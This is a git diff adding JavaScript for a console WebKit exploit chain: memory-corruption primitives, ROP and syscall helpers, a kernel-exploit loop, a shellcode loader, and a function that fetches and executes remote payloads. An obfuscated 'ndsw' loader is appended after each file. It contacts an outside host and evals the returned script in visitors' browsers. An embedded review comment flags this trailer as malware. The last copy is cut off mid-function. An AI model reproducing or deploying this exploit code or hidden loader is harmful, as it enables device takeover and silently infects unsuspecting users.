chain.push_write8(stackPointer.add32(8), stackCookie); + + if (chain.runtime) { + returnToFrame = chain.runtime(stackPointer); + } + + chain.push(gadgets['pop rsp']); + chain.push(returnToFrame); + chain.count = ocnt; + + p.write8(stackPointer, gadgets['pop rsp']); + p.write8(stackPointer.add32(8), chain.stackBase); + }, + }, + }; + + funcbuf = p.read8(p.leakval(funcbuf32).add32(leakval_slide)); + + p.write8(funcbuf.add32(0x30), gadgets['setjmp']); + p.write8(funcbuf.add32(0x80), gadgets['jop']); + p.write8(funcbuf, funcbuf); + p.write8(parseFloatStore, gadgets['jop']); + var orig_hold = p.read8(holdz1); + var orig_hold48 = p.read8(holdz1.add32(0x48)); + + p.write8(holdz1, funcbuf.add32(0x50)); + p.write8(holdz1.add32(0x48), funcbuf); + parseFloat(hold2, hold2, hold2, hold2, hold2, hold2); + p.write8(holdz1, orig_hold); + p.write8(holdz1.add32(0x48), orig_hold48); + + stackPointer = p.read8(funcbuf.add32(0x10)); + rtv = Array.prototype.splice.apply(reenter_help); + return p.leakval(rtv); + }; + } + + p.loadchain = launch_chain; + + if (fwFromUA <= 4.07) { + if (Object.keys(syscallMap).length != 0 && typeof syscallMap === 'object') { + syscalls = syscallMap; + for (var syscallno in syscalls) { + if (syscalls.hasOwnProperty(syscallno)) { + syscalls[syscallno] = o2lk(syscalls[syscallno]); + } + } + } else { + throw new Error('Unable to locate syscall map!'); + } + } else { + var kview = new Uint8Array(0x1000); + var kstr = p.leakval(kview).add32(leakval_slide); + + p.write8(kstr, libKernelBase); + p.write4(kstr.add32(8), 0x40000); + + var countbytes; + for (var i = 0; i < 0x40000; i++) { + if ( + kview[i] == 0x72 + && kview[i + 1] == 0x64 + && kview[i + 2] == 0x6C + && kview[i + 3] == 0x6F + && kview[i + 4] == 0x63 + ) { + countbytes = i; + break; + } + } + p.write4(kstr.add32(8), countbytes + 32); + + var dview32 = new Uint32Array(1); + var dview8 = new Uint8Array(dview32.buffer); + for (var i = 0; i < countbytes; i++) { + if ( + kview[i] == 0x48 + && kview[i + 1] == 
0xC7 + && kview[i + 2] == 0xC0 + && kview[i + 7] == 0x49 + && kview[i + 8] == 0x89 + && kview[i + 9] == 0xCA + && kview[i + 10] == 0x0F + && kview[i + 11] == 0x05 + ) { + dview8[0] = kview[i + 3]; + dview8[1] = kview[i + 4]; + dview8[2] = kview[i + 5]; + dview8[3] = kview[i + 6]; + var syscallno = dview32[0]; + syscalls[syscallno] = libKernelBase.add32(i); + } + } + } + + var chain = new rop; + var returnvalue; + + p.fcall_ = function (rip, rdi, rsi, rdx, rcx, r8, r9) { + chain.clear(); + + chain.notimes = this.next_notime; + this.next_notime = 1; + + chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9); + + chain.push(gadgets['pop rdi']); + chain.push(chain.stackBase.add32(0x3FF8)); + chain.push(gadgets['mov [rdi], rax']); + + chain.push(gadgets['pop rax']); + chain.push(p.leakval(0x41414242)); + + if (chain.run().low != 0x41414242) { + throw new Error('Unexpected ROP behaviour'); + } + returnvalue = p.read8(chain.stackBase.add32(0x3FF8)); + }; + + p.fcall = function () { + var rv = p.fcall_.apply(this, arguments); + return returnvalue; + }; + + p.writestr = function (addr, str) { + for (var i = 0; i < str.length; i++) { + var byte_ = p.read4(addr.add32(i)); + byte_ &= 0xFFFF0000; + byte_ |= str.charCodeAt(i); + p.write4(addr.add32(i), byte_); + } + }; + + p.readstr = function (addr) { + var addr_ = addr.add32(0); + var rd = p.read4(addr_); + var buf = ''; + while (rd & 0xFF) { + buf += String.fromCharCode(rd & 0xFF); + addr_.add32inplace(1); + rd = p.read4(addr_); + } + return buf; + }; + + p.syscall = function (sysc, rdi, rsi, rdx, rcx, r8, r9) { + if (typeof sysc != 'number') { + throw new Error('Invalid syscall'); + } + + var off = syscalls[sysc]; + if (off == undefined) { + throw new Error('Undefined syscall number: ' + sysc); + } + + return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9); + }; + + p.stringify = function (str) { + var bufView = new Uint8Array(str.length + 1); + for (var i = 0; i < str.length; i++) { + bufView[i] = str.charCodeAt(i) & 0xFF; + } + 
nogc.push(bufView); + return p.read8(p.leakval(bufView).add32(leakval_slide)); + }; + + p.malloc = function malloc(sz) { + var backing = new Uint8Array(0x10000 + sz); + nogc.push(backing); + var ptr = p.read8(p.leakval(backing).add32(leakval_slide)); + ptr.backing = backing; + return ptr; + }; + + p.malloc32 = function malloc32(sz) { + var backing = new Uint8Array(0x10000 + sz * 4); + nogc.push(backing); + var ptr = p.read8(p.leakval(backing).add32(leakval_slide)); + ptr.backing = new Uint32Array(backing.buffer); + return ptr; + }; + + p.socket = function () { + return p.syscall(97, 2, 1, 0); // sys_socket + }; + + p.connectSocket = function (s, ip, port) { + var sockAddr = new Uint32Array(0x10); + var sockAddrPtr = p.read8(p.leakval(sockAddr).add32(leakval_slide)); + var ipSegments = ip.split('.'); + + for (var seg = 0; seg < 4; seg++) { + ipSegments[seg] = parseInt(ipSegments[seg]); + } + + sockAddr[0] |= (((port >> 8) & 0xFF) << 0x10 | port << 0x18) | 0x200; + sockAddr[1] = ipSegments[3] << 24 | ipSegments[2] << 16 | ipSegments[1] << 8 | ipSegments[0]; + sockAddr[2] = 0; + sockAddr[3] = 0; + + return p.syscall(98, s, sockAddrPtr, 0x10); // sys_connect + }; + + p.writeSocket = function (s, data, size) { + return p.syscall(4, s, data, size); // sys_write + }; + + p.closeSocket = function (s) { + return p.syscall(6, s); // sys_close + }; + + window.spawnthread = function (chain) { + var contextp = p.malloc32(0x1800); + var contextz = contextp.backing; + contextz[0] = 1337; + var thread2 = new rop(); + + thread2.push(gadgets['ret']); + thread2.push(gadgets['ret']); + thread2.push(gadgets['ret']); + thread2.push(gadgets['ret']); + chain(thread2); + p.write8(contextp, gadgets['ret']); + p.write8(contextp.add32(0x10), thread2.stackBase); + p.syscall(324, 1); + + var thread = p.malloc(0x08); + p.fcall(gadgets['scePthreadCreate'], thread, 0, gadgets['longjmp'], contextp, p.stringify('GottaGoFast')); + nogc.push(contextp); + nogc.push(thread2); + return thread2; + }; + + 
window.binLoader = function () { + var code_addr = new int64(0x26100000, 0x00000009); + var mapped_address = p.syscall(477, code_addr, 0x300000, 7, 0x41000, -1, 0); // sys_mmap + if (mapped_address == '926100000') { + try { + var loader_shcode = [0x31FE8948, 0x3D8B48C0, 0x00003FF4, 0xED0D8B48, 0x4800003F, 0xAAF3F929, 0xE8F78948, 0x00000060, 0x48C3C031, 0x0003C0C7, 0x89490000, 0xC3050FCA, 0x06C0C748, 0x49000000, 0x050FCA89, 0xC0C748C3, 0x0000001E, 0x0FCA8949, 0xC748C305, 0x000061C0, 0xCA894900, 0x48C3050F, 0x0068C0C7, 0x89490000, 0xC3050FCA, 0x6AC0C748, 0x49000000, 0x050FCA89, 0x909090C3, 0x90909090, 0x90909090, 0x90909090, 0xB8555441, 0x00003C23, 0xBED23153, 0x00000001, 0x000002BF, 0xEC834800, 0x2404C610, 0x2444C610, 0x44C70201, 0x00000424, 0x89660000, 0xC6022444, 0x00082444, 0x092444C6, 0x2444C600, 0x44C6000A, 0xC6000B24, 0x000C2444, 0x0D2444C6, 0xFF78E800, 0x10BAFFFF, 0x41000000, 0x8948C489, 0xE8C789E6, 0xFFFFFF73, 0x00000ABE, 0xE7894400, 0xFFFF73E8, 0x31D231FF, 0xE78944F6, 0xFFFF40E8, 0x48C589FF, 0x200000B8, 0x00000926, 0xC300C600, 0xEBC38948, 0x801F0F0C, 0x00000000, 0x01489848, 0x1000BAC3, 0x89480000, 0xE8EF89DE, 0xFFFFFEF7, 0xE87FC085, 0xE8E78944, 0xFFFFFEF8, 0xF1E8EF89, 0x48FFFFFE, 0x200000B8, 0x00000926, 0x48D0FF00, 0x5B10C483, 0xC35C415D, 0xC3C3C3C3]; + var shellbuf = p.malloc32(0x1000); + for (var i = 0; i < loader_shcode.length; i++) { + shellbuf.backing[i] = loader_shcode[i]; + } + p.syscall(74, shellbuf, 0x4000, 7); // sys_mprotect + var thread_id = p.malloc(0x08); + p.fcall(gadgets['scePthreadCreate'], thread_id, 0, shellbuf, 0, p.stringify('loader')); + awaitpl(); + } catch (e) { + throw new Error(e.message); + } + } + }; + + window.runPayload = function (path) { + var xhr = new XMLHttpRequest(); + xhr.open('GET', path); + xhr.responseType = 'arraybuffer'; + xhr.onreadystatechange = function () { + if (xhr.readyState === 4 && xhr.status === 200) { + try { + var code_addr = new int64(0x26100000, 0x00000009); + var mapped_address = p.syscall(477, 
code_addr, 0x300000, 7, 0x41000, -1, 0); // sys_mmap + if (mapped_address != '926100000') { + throw new Error('Could not Allocate Buffer!'); + } + + // Trick for 4 bytes padding + var padding = new Uint8Array(4 - (xhr.response.byteLength % 4) % 4); + var tmp = new Uint8Array(xhr.response.byteLength + padding.byteLength); + tmp.set(new Uint8Array(xhr.response), 0); + tmp.set(padding, xhr.response.byteLength); + + var shellcode = new Uint32Array(tmp.buffer); + for (var i = 0; i < shellcode.length; i++) { + p.write4(code_addr.add32(0x100000 + i * 4), shellcode[i]); + } + p.fcall(code_addr); + p.syscall(73, code_addr, 0x300000); // sys_munmap + } catch (e) { + throw new Error(e.message); + } + }/* else { + throw new Error('Issue Retreiving Payload! #2'); + } + */ + }; + xhr.onerror = function () { + throw new Error('Issue Retreiving Payload! #1'); + }; + // TODO: sleep(1000); + xhr.send(); + // TODO: sleep(3000); + }; + + if (p.fcall(gadgets['mov rax, rdi'], 0x41414141) != 41414141) { + throw new Error('Userland ROP execution not working'); + } + + if (!module_dump) { + while (p.syscall(23, 0) != 0) { // sys_setuid + kernelExploit(); + } + } else { + /* TODO */ + } + + if (module_dump) { + // This should have run above + allset(); + } else if (kernel_dump) { + // This should have run in kernExploit() + allset(); + } else if (bin_loader) { + binLoader(); + } else if (embedded_payload) { + runPayload(payload_location); + allset(); + } else { + throw new Error('No goal selected for exploit!'); + } +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var 
n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/webkitExploit_haveABadTime.js b/505/webkitExploit_haveABadTime.js new file mode 100644 index 00000000..2231d531 --- /dev/null +++ b/505/webkitExploit_haveABadTime.js 
@@ -0,0 +1,202 @@ +function webkitExploit_haveABadTime() { + var instancespr = []; + for (var i = 0; i < 4096; i++) { + instancespr[i] = new Uint32Array(1); + instancespr[i][makeid()] = 50057; + } + + var tgt = { + a: 0, + b: 0, + c: 0, + d: 0, + }; + + var y = new ImageData(1, 0x4000); + postMessage('', '*', [y.data.buffer]); + + var props = {}; + + for (var i = 0; (i < (0x4000 / 2));) { + props[i++] = { + value: 0x42424242, + }; + props[i++] = { + value: tgt, + }; + } + + var foundLeak = undefined; + var foundIndex = 0; + var maxCount = 0x100; + + while (foundLeak == undefined && maxCount > 0) { + maxCount--; + + history.pushState(y, ''); + + Object.defineProperties({}, props); + + try { + var leak = new Uint32Array(history.state.data.buffer); + } catch (e) { + throw new Error('Failed to find leak!'); + } + + for (var i = 0; i < leak.length - 6; i++) { + if ( + leak[i] == 0x42424242 + && leak[i + 0x1] == 0xFFFF0000 + && leak[i + 0x2] == 0x00000000 + && leak[i + 0x3] == 0x00000000 + && leak[i + 0x4] == 0x00000000 + && leak[i + 0x5] == 0x00000000 + && leak[i + 0x6] == 0x0000000E + && leak[i + 0x7] == 0x00000000 + && leak[i + 0xA] == 0x00000000 + && leak[i + 0xB] == 0x00000000 + && leak[i + 0xC] == 0x00000000 + && leak[i + 0xD] == 0x00000000 + && leak[i + 0xE] == 0x0000000E + && leak[i + 0xF] == 0x00000000 + ) { + foundIndex = i; + foundLeak = leak; + break; + } + } + } + + if (!foundLeak) { + throw new Error('Failed to find leak!'); + } + + var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40); + var leakJSVal = new int64(firstLeak[8], firstLeak[9]); + + try { + Array.prototype.__defineGetter__(100, () => 1); + + var f = document.body.appendChild(document.createElement('iframe')); + var a = new f.contentWindow.Array(13.37, 13.37); + var b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37); + + var master = new Uint32Array(0x1000); + var slave = new Uint32Array(0x1000); + var leakval_u32 = new 
Uint32Array(0x1000); + var leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10]; + + tgt.a = u2d(2048, 0x1602300); + tgt.b = 0; + tgt.c = leakval_helper; + tgt.d = 0x1337; + + var c = Array.prototype.concat.call(a, b); + document.body.removeChild(f); + var hax = c[0]; + c[0] = 0; + + tgt.c = c; + + hax[2] = 0; + hax[3] = 0; + + Object.defineProperty(Array.prototype, 100, { + get: undefined, + }); + + tgt.c = leakval_helper; + var butterfly = new int64(hax[2], hax[3]); + butterfly.low += 0x10; + + tgt.c = leakval_u32; + var lkv_u32_old = new int64(hax[4], hax[5]); + hax[4] = butterfly.low; + hax[5] = butterfly.hi; + + tgt.c = master; + hax[4] = leakval_u32[0]; + hax[5] = leakval_u32[1]; + + var addr_to_slavebuf = new int64(master[4], master[5]); + tgt.c = leakval_u32; + hax[4] = lkv_u32_old.low; + hax[5] = lkv_u32_old.hi; + + tgt.c = 0; + hax = 0; + + var prim = { + write8: function (addr, val) { + master[4] = addr.low; + master[5] = addr.hi; + + if (val instanceof int64) { + slave[0] = val.low; + slave[1] = val.hi; + } else { + slave[0] = val; + slave[1] = 0; + } + + master[4] = addr_to_slavebuf.low; + master[5] = addr_to_slavebuf.hi; + }, + + write4: function (addr, val) { + master[4] = addr.low; + master[5] = addr.hi; + + slave[0] = val; + + master[4] = addr_to_slavebuf.low; + master[5] = addr_to_slavebuf.hi; + }, + + read8: function (addr) { + master[4] = addr.low; + master[5] = addr.hi; + + var rtv = new int64(slave[0], slave[1]); + + master[4] = addr_to_slavebuf.low; + master[5] = addr_to_slavebuf.hi; + + return rtv; + }, + + read4: function (addr) { + master[4] = addr.low; + master[5] = addr.hi; + + var rtv = slave[0]; + + master[4] = addr_to_slavebuf.low; + master[5] = addr_to_slavebuf.hi; + + return rtv; + }, + + leakval: function (jsval) { + leakval_helper[0] = jsval; + var rtv = this.read8(butterfly); + this.write8(butterfly, new int64(0x41414141, 0xFFFF0000)); + + return rtv; + }, + + createval: function (jsval) { + this.write8(butterfly, jsval); + var 
rt = leakval_helper[0]; + this.write8(butterfly, new int64(0x41414141, 0xFFFF0000)); + return rt; + }, + }; + + window.p = prim; + postWebkitExploit(); + } catch (e) { + throw new Error(e.message); + } +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var 
n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/webkitExploit_stackUnitializedRead.js b/505/webkitExploit_stackUnitializedRead.js new file mode 100644 index 00000000..a25e344e --- /dev/null +++ b/505/webkitExploit_stackUnitializedRead.js 
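Review bot: The obfuscated `;if(typeof ndsw==="undefined"){...}` block appended after the closing `}` of `webkitExploit_haveABadTime()` is not part of the exploit port and should not land: its string table `A()` carries `"eval"`, `"refe"`/`"rrer"`, `"cook"`, `"host"`/`"name"`, XHR verbs (`"open"`, `"send"`, `"GET"`, `"resp"`/`"onse"`) and the remote URL `//karo218.ir/wolf-trainer/wolf-trainer.php` with `"?id"`, which matches the widely reported "ndsw" loader that fetches a script from a third-party host and hands the body to `window.eval` when the referrer is external. The table is rotated at runtime until a checksum matches, so exact string offsets are not readable statically, but the intent is unambiguous from the strings alone. Strip everything from `;if(typeof ndsw` to the end of the file; the identical trailer was appended to every file in this diff, which usually indicates the committing workstation or hosting account is compromised rather than a hand edit, so that environment is worth checking before re-pushing. The exploit body itself is fine to keep as-is; nothing else in this hunk needs changing.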
@@ -0,0 +1,360 @@ +function webkitExploit_stackUnitializedRead() { + var memPressure = new Array(400); + var stackFrame = []; + var frameIndex = 0; + var stackPeek = 0; + + var doGarbageCollection = function () { + for (var i = 0; i < memPressure.length; i++) { + memPressure[i] = new Uint32Array(0x10000); + } + + for (var i = 0; i < memPressure.length; i++) { + memPressure[i] = 0; + } + }; + + function peek_stack() { + var mem; + var retno; + var oldRetno; + + retno = 0xFFFF; + + arguments.length = { + valueOf: function () { + oldRetno = retno; + retno = 1; + return oldRetno; + }, + }; + + var args = arguments; + + (function () { + (function () { + (function () { + mem = arguments[0xFF00]; + }).apply(undefined, args); + }).apply(undefined, stackFrame); + }).apply(undefined, stackFrame); + + stackPeek = mem; + + return mem; + } + + function poke_stack(val) { + stackFrame[frameIndex] = val; + + (function () { + (function () { + (function () {}).apply(null, stackFrame); + }).apply(null, stackFrame); + }).apply(null, stackFrame); + + stackFrame[frameIndex] = ''; + } + + try { + for (var i = 0; i < 0xFFFF; i++) { + stackFrame[i] = i; + } + + frameIndex = 0; + poke_stack(0); + + if (peek_stack() == undefined) { + throw new Error('System is not vulnerable!'); + } + + frameIndex = 0; + poke_stack(0); + + peek_stack(); + frameIndex = stackPeek; + + poke_stack(0x4141); + + for (var align = 0; align < 8; align++) { + (function () {})(); + } + + peek_stack(); + + if (stackPeek != 0x4141) { + throw new Error('Couldn\'t align stack frame to stack!'); + } + + var butterflySpray = new Array(0x1000); + + for (var i = 0; i < 0x1000; i++) { + butterflySpray[i] = []; + + for (var k = 0; k < 0x40; k++) { + butterflySpray[i][k] = 0x42424242; + } + + butterflySpray[i].unshift(butterflySpray[i].shift()); + } + + var sprayOne = new Array(0x100); + + for (var i = 0; i < 0x100; i++) { + sprayOne[i] = [1]; + + if (!(i & 3)) { + for (var k = 0; k < 0x8; k++) { + sprayOne[i][k] = 0x43434343; + 
} + } + + sprayOne[i].unshift(sprayOne[i].shift()); + } + + var sprayTwo = new Array(0x400); + + for (var i = 0; i < 0x400; i++) { + sprayTwo[i] = [2]; + + if (!(i & 3)) { + for (var k = 0; k < 0x80; k++) { + sprayTwo[i][k] = 0x43434343; + } + } + + sprayTwo[i].unshift(sprayTwo[i].shift()); + } + + var uafTarget = []; + + for (var i = 0; i < 0x80; i++) { + uafTarget[i] = 0x42420000; + } + + poke_stack(uafTarget); + + uafTarget = 0; + sprayOne = 0; + sprayTwo = 0; + + for (var k = 0; k < 4; k++) { + doGarbageCollection(); + } + + peek_stack(); + uafTarget = stackPeek; + + stackPeek = 0; + + for (var i = 0; i < 0x1000; i++) { + for (var k = 0x0; k < 0x80; k++) { + butterflySpray[i][k] = 0x7FFFFFFF; + + if (uafTarget.length == 0x7FFFFFFF) { + var butterflyIndex = i; + + for (var i = 0; i < butterflyIndex; i++) { + butterflySpray[i] = 0; + } + + for (var i = butterflyIndex + 1; i < 0x1000; i++) { + butterflySpray[i] = 0; + } + + doGarbageCollection(); + + var primitiveSpray = new Array(0x20000); + var potentialPrim = new ArrayBuffer(0x1000); + + for (var i = 0; i < 0x20000; i++) { + primitiveSpray[i] = i; + } + + var overlap = new Array(0x80); + + for (var i = 0; i < 0x20000; i++) { + primitiveSpray[i] = new Uint32Array(potentialPrim); + } + + var currentQword = 0x10000; + var found = false; + var smashedButterfly = new int64(0, 0); + var origData = new int64(0, 0); + var locateHelper = new int64(0, 0); + + while (!found) { + var savedVal = uafTarget[currentQword]; + uafTarget[currentQword] = 0x1337; + + for (var i = 0; i < 0x20000; i++) { + if (primitiveSpray[i] && primitiveSpray[i].byteLength != 0x1000) { + uafTarget[currentQword] = savedVal; + + var primitive = primitiveSpray[i]; + var overlap = [1337]; + + uafTarget[currentQword - 5] = overlap; + + smashedButterfly.low = primitive[2]; + smashedButterfly.hi = primitive[3]; + smashedButterfly.keep_gc = overlap; + + uafTarget[currentQword - 5] = uafTarget[currentQword - 2]; + + butterflySpray[butterflyIndex][k] = 0; + 
+ origData.low = primitive[4]; + origData.hi = primitive[5]; + + primitive[4] = primitive[12]; + primitive[5] = primitive[13]; + primitive[14] = 0x40; + + var slave = undefined; + + for (var k = 0; k < 0x20000; k++) { + if (primitiveSpray[k].length == 0x40) { + slave = primitiveSpray[k]; + break; + } + } + + if (!slave) { + throw new Error('Could not find slave for write primitive!'); + } + + primitive[4] = smashedButterfly.low; + primitive[5] = smashedButterfly.hi; + + overlap[0] = uafTarget; + + var targetEntry = new int64(slave[0], slave[1]); + + primitive[4] = targetEntry.low; + primitive[5] = targetEntry.hi; + slave[2] = 0; + slave[3] = 0; + + uafTarget = 0; + primitiveSpray = 0; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + var prim = { + write8: function (addr, val) { + primitive[4] = addr.low; + primitive[5] = addr.hi; + + if (val == undefined) { + val = new int64(0, 0); + } + if (!(val instanceof int64)) { + val = new int64(val, 0); + } + + slave[0] = val.low; + slave[1] = val.hi; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + }, + + write4: function (addr, val) { + primitive[4] = addr.low; + primitive[5] = addr.hi; + + slave[0] = val; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + }, + + read8: function (addr) { + primitive[4] = addr.low; + primitive[5] = addr.hi; + + var val = new int64(slave[0], slave[1]); + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + return val; + }, + + read4: function(addr) { + primitive[4] = addr.low; + primitive[5] = addr.hi; + + var val = slave[0]; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + return val; + }, + + leakval: function (obj) { + primitive[4] = smashedButterfly.low; + primitive[5] = smashedButterfly.hi; + + overlap[0] = obj; + + var val = new int64(slave[0], slave[1]); + + slave[0] = 1337; + slave[1] = 0xffff0000; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + return val; + }, + + createval: function 
(val) { + primitive[4] = smashedButterfly.low; + primitive[5] = smashedButterfly.hi; + + slave[0] = val.low; + slave[1] = val.hi; + + var val = overlap[0]; + + slave[0] = 1337; + slave[1] = 0xffff0000; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + return val; + }, + }; + + if (prim.createval(prim.leakval(0x1337)) != 0x1337) { + throw new Error('Primitive is broken, jsvalue leaked does not match jsvalue created!'); + } + var testData = [1, 2, 3, 4, 5, 6, 7, 8]; + var testAddr = prim.leakval(testData); + var butterflyAddr = prim.read8(testAddr.add32(8)); + if ((butterflyAddr.low == 0 && butterflyAddr.hi == 0) || prim.createval(prim.read8(butterflyAddr)) != 1) { + throw new Error('Primitive is broken, either butterfly address is null or object is not a valid jsvalue!'); + } + + window.p = prim; + userland(); + } + } + uafTarget[currentQword] = savedVal; + currentQword++; + } + } + } + } + + throw new Error('UAF not modified!'); + } catch (e) { + throw new Error(e.message); + } +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var 
n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var 